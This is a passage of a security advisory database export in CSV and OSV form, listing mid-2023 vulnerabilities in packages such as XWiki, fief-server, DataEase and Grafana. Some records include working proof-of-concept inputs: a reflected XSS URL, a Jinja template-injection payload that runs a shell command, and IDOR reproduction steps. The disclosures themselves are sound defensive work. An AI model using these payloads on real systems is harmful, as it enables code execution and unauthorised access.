authorization server SHOULD NOT process authorization requests automatically without user consent or interaction, except when the identity of the client can be assured. **This includes the case where the user has previously approved an authorization request for a given client id** But Doorkeeper automatically processes authorization requests without user consent for public clients that have been previously approved. Public clients are inherently vulnerable to impersonation, their identity cannot be assured. Issue https://github.com/doorkeeper-gem/doorkeeper/issues/1589 Fix https://github.com/doorkeeper-gem/doorkeeper/pull/1646","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'doorkeeper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/doorkeeper-gem/doorkeeper/security/advisories/GHSA-7w2c-w47h-789w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34246'}, {'type': 'WEB', 'url': 'https://github.com/doorkeeper-gem/doorkeeper/issues/1589'}, {'type': 'WEB', 'url': 'https://github.com/doorkeeper-gem/doorkeeper/pull/1646'}, {'type': 'PACKAGE', 'url': 'https://github.com/doorkeeper-gem/doorkeeper'}, {'type': 'WEB', 'url': 'https://github.com/doorkeeper-gem/doorkeeper/releases/tag/v5.6.6'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/doorkeeper/CVE-2023-34246.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/07/msg00016.html'}, {'type': 'WEB', 'url': 'https://www.rfc-editor.org/rfc/rfc8252#section-8.6'}]","{'cwe_ids': ['CWE-287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T19:50:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-mjff-wv85-hmcj,2023-06-27T20:28:27Z,2023-06-19T09:30:17Z,,['CVE-2023-35005'],Apache Airflow vulnerable to exposure of sensitive information,"In Apache Airflow, some potentially sensitive values were being shown to the user in certain situations. This vulnerability is mitigated by the fact configuration is not shown in the UI by default (only if `[webserver] expose_config` is set to `non-sensitive-only`), and not all uncensored values are actually sentitive. This issue affects Apache Airflow: from 2.5.0 before 2.6.2. Users are recommended to update to version 2.6.2 or later. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35005'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/31788'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/31820'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2023-89.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/o4f2cxh0054m9tlxpb81c1yhylor5gjd'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-19T22:47:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-87mf-9wg6-ppf8,2023-06-16T17:45:05Z,2023-06-12T18:52:23Z,,[],Ouroboros is Unsound,"In 0.15.0 and prior, Ouroboros works internally by creating a struct where all uses of 'this are replaced by 'static. However, a recent addition to Miri checks that references passed to functions are valid during the entire execution of the function, even when those references are passed inside a struct. This poses an issue for dropping self-referencing values, as the reference becomes invalid during the dropping process. Effectively, since self-referencing structs are not allowed in vanilla Rust, there is no allowance for dropping data during a function that has also been given a reference to that data. There's usually no way to pass a and &a to the same function. A fix was attempted, where the struct would be turned in to a raw byte array and only transformed back into the underlying data type inside each function. This is allowable as a reference can be created and die over the body of a function, as long as the reference was created inside the function. However, this is also not sound if the original struct contains padding. There is no way to initialize padding bytes to a known value that Miri will accept, so when it is cast to an array some of the bytes contain uninitialized values. This is not acceptable (despite the fact that these bytes are never read) due to the potential for optimizations that may read from the uninitialized bytes. Besides which, this fix does not allow for template or constant parameters as there is no way to check the size of a templated type without giving specific, concrete values for the template parameters. The final solution was to use this fix while wrapping the raw byte array in MaybeUninit<>.",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'ouroboros'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.16.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/joshua-maros/ouroboros/issues/88'}, {'type': 'PACKAGE', 'url': 'https://github.com/joshua-maros/ouroboros'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0042.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T18:52:23Z', 'nvd_published_at': None}" 1.4.0,GHSA-7c94-gvvj-r3mg,2023-06-05T20:36:58Z,2023-06-05T20:36:58Z,,[],"cheqd-node affected by Inter-blockchain Communication (IBC) protocol ""Huckleberry"" vulnerability","### Impact This vulnerability affects the [`ibc-go` package for those running full nodes, dubbed ""Huckleberry""](https://forum.cosmos.network/t/ibc-security-advisory-huckleberry/10731). According to their advisory: > This issue is low-severity in general, and it has a low impact and likelihood of exploitation. Depending on how a full node is architected, this issue could potentially yield a high or critical severity vulnerability. There is no vulnerability in the DID/resource modules for cheqd-node. ### Patches Node operators are requested to upgrade to [cheqd-node v1.4.2](https://github.com/cheqd/cheqd-node/releases/tag/v1.4.2). This is a non-state breaking release, and does not require a coordinated upgrade across all node operators. ### Workarounds No. Node operators are recommended to upgrade to the latest release version. ### References - [""Huckleberry"" IBC security advisory](https://forum.cosmos.network/t/ibc-security-advisory-huckleberry/10731) - [`ibc-go` v6.1.1 release notes](https://github.com/cosmos/ibc-go/releases/tag/v6.1.1) ",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/cheqd/cheqd-node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cheqd/cheqd-node/security/advisories/GHSA-7c94-gvvj-r3mg'}, {'type': 'WEB', 'url': 'https://github.com/cheqd/cheqd-node/commit/f325f5f250e150e3e76a5a557669f67b606e34e1'}, {'type': 'WEB', 'url': 'https://forum.cosmos.network/t/ibc-security-advisory-huckleberry/10731'}, {'type': 'PACKAGE', 'url': 'https://github.com/cheqd/cheqd-node'}, {'type': 'WEB', 'url': 'https://github.com/cheqd/cheqd-node/releases/tag/v1.4.2'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/ibc-go/releases/tag/v6.1.1'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-05T20:36:58Z', 'nvd_published_at': None}" 1.4.0,GHSA-rwcp-qrwg-56cg,2023-06-30T19:58:47Z,2023-06-22T15:30:23Z,,['CVE-2023-34927'],Casdoor Cross-Site Request Forgery vulnerability,Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint `/api/set-password`. This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/casdoor/casdoor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.331.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34927'}, {'type': 'WEB', 'url': 'https://github.com/casdoor/casdoor/issues/1531'}, {'type': 'WEB', 'url': 'https://casdoor.org/'}, {'type': 'WEB', 'url': 'https://gist.github.com/omriman067/4e90a3a4ffa40984f011d8777a995469'}, {'type': 'PACKAGE', 'url': 'https://github.com/casdoor/casdoor'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:01:21Z', 'nvd_published_at': None}" 1.4.0,GHSA-rqjq-ww83-wv5c,2023-06-06T02:04:22Z,2023-06-03T00:30:16Z,,['CVE-2023-2816'],Hashicorp Consul allows user with service:write permissions to patch remote proxy instances,"Consul and Consul Enterprise allowed any user with service:write permissions to use Envoy extensions configured via service-defaults to patch remote proxy instances that target the configured service, regardless of whether the user has permission to modify the service(s) corresponding to those modified proxies.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.15.0'}, {'fixed': '1.15.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2816'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-16-consul-envoy-extension-downstream-proxy-configuration-by-upstream-service-owner/54525'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/consul'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:04:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-jrjw-qgr2-wfcg,2023-06-23T21:37:26Z,2023-06-23T21:37:26Z,,['CVE-2023-33141'],YARP Denial of Service Vulnerability,"### Impact A denial of service vulnerability exists in YARP. ### Patches If you're using YARP 1.x, you should update to NuGet package version [1.1.2](https://www.nuget.org/packages/Yarp.ReverseProxy/1.1.2). If you're using YARP 2.0.0, you should update to NuGet package version [2.0.1](https://www.nuget.org/packages/Yarp.ReverseProxy/2.0.1). You can do so by updating the `PackageReference` in your `.csproj` file ```diff - - + + ``` or by selecting `2.0.1` in the NuGet UI inside Visual Studio (`Manage NuGet Packages` / `Updates`) ### References [CVE-2023-33141](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33141) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Yarp.ReverseProxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.1'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Yarp.ReverseProxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.1'}]}], 'versions': ['2.0.0']}]","[{'type': 'WEB', 'url': 'https://github.com/microsoft/reverse-proxy/security/advisories/GHSA-jrjw-qgr2-wfcg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33141'}, {'type': 'PACKAGE', 'url': 'https://github.com/microsoft/reverse-proxy'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33141'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/Yarp.ReverseProxy/1.1.2'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/Yarp.ReverseProxy/2.0.1'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:37:26Z', 'nvd_published_at': None}" 1.4.0,GHSA-vmxg-wx6c-4f3r,2023-06-28T16:28:27Z,2023-06-23T15:30:43Z,,['CVE-2023-3303'],Admidio Improper Access Control vulnerability,Admidio prior to 4.2.9 is vulnerable to Improper Access Control.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'admidio/admidio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3303'}, {'type': 'WEB', 'url': 'https://github.com/admidio/admidio/commit/3d8bafaa4e9b7a314ffdf548622a8c7b38faee8a'}, {'type': 'PACKAGE', 'url': 'https://github.com/admidio/admidio'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/65d260cc-55a9-4e71-888d-cb2f66c071af'}]","{'cwe_ids': ['CWE-284'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T17:00:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-m3v5-gjj9-rg24,2023-06-27T21:58:21Z,2023-06-20T15:31:08Z,,['CVE-2023-33495'],Craft CMS vulnerable to HTML injection,Craft CMS through 4.4.9 is vulnerable to HTML Injection.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.4.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33495'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://medium.com/@mondalsomnath9135/html-injection-in-craft-cms-application-e2b28f746212'}, {'type': 'WEB', 'url': 'https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/03-Testing_for_HTML_Injection'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T18:36:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-q36x-r5x4-h4q6,2023-06-09T19:32:49Z,2023-06-09T19:32:49Z,,['CVE-2022-0618'],Denial of service via HTTP/2 HEADERS frames padding,"A program using swift-nio-http2 is vulnerable to a denial of service attack, caused by a network peer sending a specially crafted HTTP/2 frame. This attack affects all swift-nio-http2 versions from 1.0.0 to 1.19.2. It is fixed in 1.20.0 and later releases. This vulnerability is caused by a logical error when parsing a HTTP/2 HEADERS or HTTP/2 PUSH_PROMISE frame where the frame contains padding information without any other data. This logical error caused confusion about the size of the frame, leading to a parsing error. This parsing error immediately crashes the entire process. Sending a HEADERS frame or PUSH_PROMISE frame with HTTP/2 padding information does not require any special permission, so any HTTP/2 connection peer may send such a frame. For clients, this means any server to which they connect may launch this attack. For servers, anyone they allow to connect to them may launch such an attack. The attack is low-effort: it takes very little resources to send an appropriately crafted frame. The impact on availability is high: receiving the frame immediately crashes the server, dropping all in-flight connections and causing the service to need to restart. It is straightforward for an attacker to repeatedly send appropriately crafted frames, so attackers require very few resources to achieve a substantial denial of service. The attack does not have any confidentiality or integrity risks in and of itself: swift-nio-http2 is parsing the frame in memory-safe code, so the crash is safe. However, sudden process crashes can lead to violations of invariants in services, so it is possible that this attack can be used to trigger an error condition that has confidentiality or integrity risks. The risk can be mitigated if untrusted peers can be prevented from communicating with the service. This mitigation is not available to many services. The issue is fixed by rewriting the parsing code to correctly handle the condition. The issue was found by automated fuzzing by oss-fuzz.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/apple/swift-nio-http2.git'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.20'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apple/swift-nio-http2/security/advisories/GHSA-q36x-r5x4-h4q6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-0618'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio-http2/commit/ac2a5afce3dbb6795b4f78ec3f19726dc28f5617'}, {'type': 'PACKAGE', 'url': 'https://github.com/apple/swift-nio-http2'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T19:32:49Z', 'nvd_published_at': '2022-03-10T17:44:00Z'}" 1.4.0,GHSA-7g45-4rm6-3mm3,2023-06-14T21:01:07Z,2023-06-14T18:30:38Z,,['CVE-2023-2976'],Guava vulnerable to insecure use of temporary directory,"Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to be able to access the files created by the class. Even though the security vulnerability is fixed in version 32.0.0, maintainers recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.google.guava:guava'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '32.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2976'}, {'type': 'WEB', 'url': 'https://github.com/google/guava/issues/2575'}, {'type': 'WEB', 'url': 'https://github.com/google/guava/issues/6532'}, {'type': 'WEB', 'url': 'https://github.com/google/guava/commit/feb83a1c8fd2e7670b244d5afd23cba5aca43284'}, {'type': 'PACKAGE', 'url': 'https://github.com/google/guava'}, {'type': 'WEB', 'url': 'https://github.com/google/guava/releases/tag/v32.0.0'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230818-0008/'}]","{'cwe_ids': ['CWE-379', 'CWE-552'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T21:01:07Z', 'nvd_published_at': None}" 1.4.0,GHSA-75m3-f4hr-2vh9,2023-06-27T19:48:59Z,2023-06-14T15:30:39Z,,['CVE-2023-35110'],jjson vulnerable to stack exhaustion,An issue was discovered jjson through 0.1.7 allows attackers to cause a denial of service or other unspecified impacts via crafted objects that deeply nested structures.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'de.grobmeier.json:jjson'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35110'}, {'type': 'WEB', 'url': 'https://github.com/grobmeier/jjson/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/grobmeier/jjson'}]","{'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T21:11:23Z', 'nvd_published_at': None}" 1.4.0,GHSA-834c-x29c-f42c,2023-06-30T20:24:46Z,2023-06-22T19:59:10Z,,['CVE-2023-35156'],XWiki Platform vulnerable to reflected cross-site scripting via xredirect parameter in delete template,"### Impact Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the delete template to perform a XSS, e.g. by using URL such as: > xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain) This vulnerability exists since XWiki 6.0-rc-1. ### Patches The vulnerability has been patched in XWiki 14.10.6 and 15.1. Note that a partial patch has been provided in 14.10.5 but wasn't enough to entirely fix the vulnerability. ### Workarounds It's possible to workaround the vulnerability by editing the template delete.vm to perform checks on it, but note that the appropriate fix involves new APIs that have been recently introduced in XWiki. See the referenced jira tickets. ### References * Jira ticket about the original vulnerability: https://jira.xwiki.org/browse/XWIKI-20341 * Commit containing the first fix in the template: https://github.com/xwiki/xwiki-platform/commit/e80d22d193df364b07bab7925572720f91a8984a * Jira ticket about the second part of the vulnerability found after 14.10.5: https://jira.xwiki.org/browse/XWIKI-20672 * Commits containing the second fix in the template: * https://github.com/xwiki/xwiki-platform/commit/13875a6437d4525ac4aeea25918f2d2dffac9ee1 * https://github.com/xwiki/xwiki-platform/commit/24ec12890ac7fa6daec8d0b3435cfcba11362fd5 * Introduction of the macro used for fixing all those vulnerabilities: https://jira.xwiki.org/browse/XWIKI-20583 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ### Attribution This vulnerability has been reported by René de Sain @renniepak.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin-resources'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0-rc-1'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin-resources'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-0'}, {'fixed': '15.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-834c-x29c-f42c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35156'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/13875a6437d4525ac4aeea25918f2d2dffac9ee1'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/24ec12890ac7fa6daec8d0b3435cfcba11362fd5'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/e80d22d193df364b07bab7925572720f91a8984a'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20341'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20583'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20672'}]","{'cwe_ids': ['CWE-79', 'CWE-87'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T19:59:10Z', 'nvd_published_at': None}" 1.4.0,GHSA-7hv6-gv38-78wj,2023-06-02T17:09:17Z,2023-06-02T17:09:17Z,,['CVE-2023-32310'],DataEase API interface has IDOR vulnerability,"### Impact The api interface for DataEase delete dashboard and delete system messages is vulnerable to IDOR. The interface to delete the dashboard: 1. Create two users: user1 and user2 2. User1 creates a dashboard named pan1 3. User2 creates a dashboard named pan2 4. Both user1 and user2 share their dashboards with the demo user 5. User1 wants to delete his dashboard. We hijack the request with burpsuite. The request will probably look like this: POST /api/share/removePanelShares/440efa7f-efd8-11ed-bec7-1144724bc08c HTTP/1.1. 440efa7f-efd8-11ed-bec7-1144724bc08c is the ID of pan1 6. We replace this ID with the ID of pan2 and continue the execution (i.e. we delete the shares of others) 7. Successfully remove the shared link ![image](https://user-images.githubusercontent.com/985347/238271028-d23a9ca3-cd77-42a2-9199-a28ef03f5bf0.png) The interface to delete system messages: 1. Our request to delete a message is shown below ![image](https://user-images.githubusercontent.com/985347/238271474-1bf6be85-7a39-436d-b209-ac88bf52b591.png) 2. We can delete all messages by simply enumerating the message ID, regardless of whether the message belongs to the requester or not. 3. The interface for marking read messages is also affected Affected versions: <= 1.18.6 ### Patches The vulnerability has been fixed in v1.18.7. ### Workarounds It is recommended to upgrade the version to v1.18.7. ### References If you have any questions or comments about this advisory: Open an issue in https://github.com/dataease/dataease Email us at [wei@fit2cloud.com](mailto:wei@fit2cloud.com) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.dataease:dataease-plugin-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.18.6'}}]","[{'type': 'WEB', 'url': 'https://github.com/dataease/dataease/security/advisories/GHSA-7hv6-gv38-78wj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32310'}, {'type': 'WEB', 'url': 'https://github.com/dataease/dataease/pull/5342'}, {'type': 'WEB', 'url': 'https://github.com/dataease/dataease/commit/72f428e87b5395c03d2f94ef6185fc247ddbc8dc'}, {'type': 'PACKAGE', 'url': 'https://github.com/dataease/dataease'}, {'type': 'WEB', 'url': 'https://github.com/dataease/dataease/releases/tag/v1.18.7'}]","{'cwe_ids': ['CWE-639'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-02T17:09:17Z', 'nvd_published_at': None}" 1.4.0,GHSA-mpv3-g8m3-3fjc,2023-06-23T21:38:39Z,2023-06-22T21:30:49Z,,['CVE-2023-3128'],Grafana vulnerable to Authentication Bypass by Spoofing,"Grafana is validating Azure AD accounts based on the email claim. On Azure AD, the profile email field is not unique and can be easily modified. This leads to account takeover and authentication bypass when Azure AD OAuth is configured with a multi-tenant app. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.0'}, {'fixed': '9.4.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.3.0'}, {'fixed': '9.3.16'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.2.20'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.27'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/grafana/bugbounty/security/advisories/GHSA-gxh2-6vvc-rrgp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3128'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/grafana'}, {'type': 'WEB', 'url': 'https://github.com/grafana/grafana/blob/69fc4e6bc0be2a82085ab3885c2262a4d49e97d8/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://grafana.com/security/security-advisories/cve-2023-3128/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230714-0004/'}]","{'cwe_ids': ['CWE-290'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:38:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-hj8m-9fhf-v7jp,2023-06-23T21:46:11Z,2023-06-23T21:46:11Z,,[],fief-server Server-Side Template Injection vulnerability,"# Server-Side Template Injection ## Overview of the Vulnerability Server-Side Template Injection (SSTI) is a vulnerability within application templating engines where user input is improperly handled and is embedded into the template, possibly leading code being executed. An attacker can use SSTI to execute code on the underlying system by manipulating values within the embedded template. When code is executed within the underlying system, it can allow an attacker to run permissioned commands under the exploited process, or exploit Cross-Site Scripting (XSS) to run code within the user's browser. ## Business Impact SSTI can lead to reputational damage for the business due to a loss in confidence and trust by users. If an attacker successfully executes code within the underlying system, it can result in data theft and indirect financial losses. ## Steps to Reproduce 1. [Sign up](https://fief.fief.dev/register) and login to your account 1. Use a browser to navigate to: email-templates {{[URL](https://test.fief.dev/admin/customization/email-templates/)}} 1. put your payload in Edit Base template `{{ cycler.__init__.__globals__.os.popen('id').read() }}` and you will se it will execute. Payload: `{{ cycler.__init__.__globals__.os.popen('id').read() }}` ## Proof of Concept (PoC) The screenshot(s) below demonstrates the SSTI: ![SSTI](https://user-images.githubusercontent.com/42150485/248214990-854c2272-4f34-4c49-9759-d49ce8ce3d12.png) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'fief-server'}, 'ecosystem_specific': {'affected_functions': ['fief.apps.dashboard.routers.email_templates.update_email_template', 'fief.services.email_template.renderers.EmailTemplateRenderer._get_jinja_environment', 'fief.services.email_template.renderers.EmailSubjectRenderer._get_jinja_environment']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.19.0'}, {'fixed': '0.25.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fief-dev/fief/security/advisories/GHSA-hj8m-9fhf-v7jp'}, {'type': 'WEB', 'url': 'https://github.com/fief-dev/fief/commit/91e56625b641fa419e2985772266774bae18382b'}, {'type': 'PACKAGE', 'url': 'https://github.com/fief-dev/fief'}, {'type': 'WEB', 'url': 'https://github.com/fief-dev/fief/releases/tag/v0.25.3'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:46:11Z', 'nvd_published_at': None}" 1.4.0,GHSA-h7cw-44vp-jq7h,2023-06-28T16:33:19Z,2023-06-20T19:55:36Z,,['CVE-2023-35166'],XWiki Platform vulnerable to privilege escalation (PR) from account through TipsPanel,"### Impact It's possible to execute any wiki content with the right of the TipsPanel author by creating a tip UI extension. To reproduce: * Add an object of type UIExtensionClass * Set ""Extension Point ID"" to org.xwiki.platform.help.tipsPanel * Set ""Extension ID"" to org.xwiki.platform.user.test (needs to be unique but 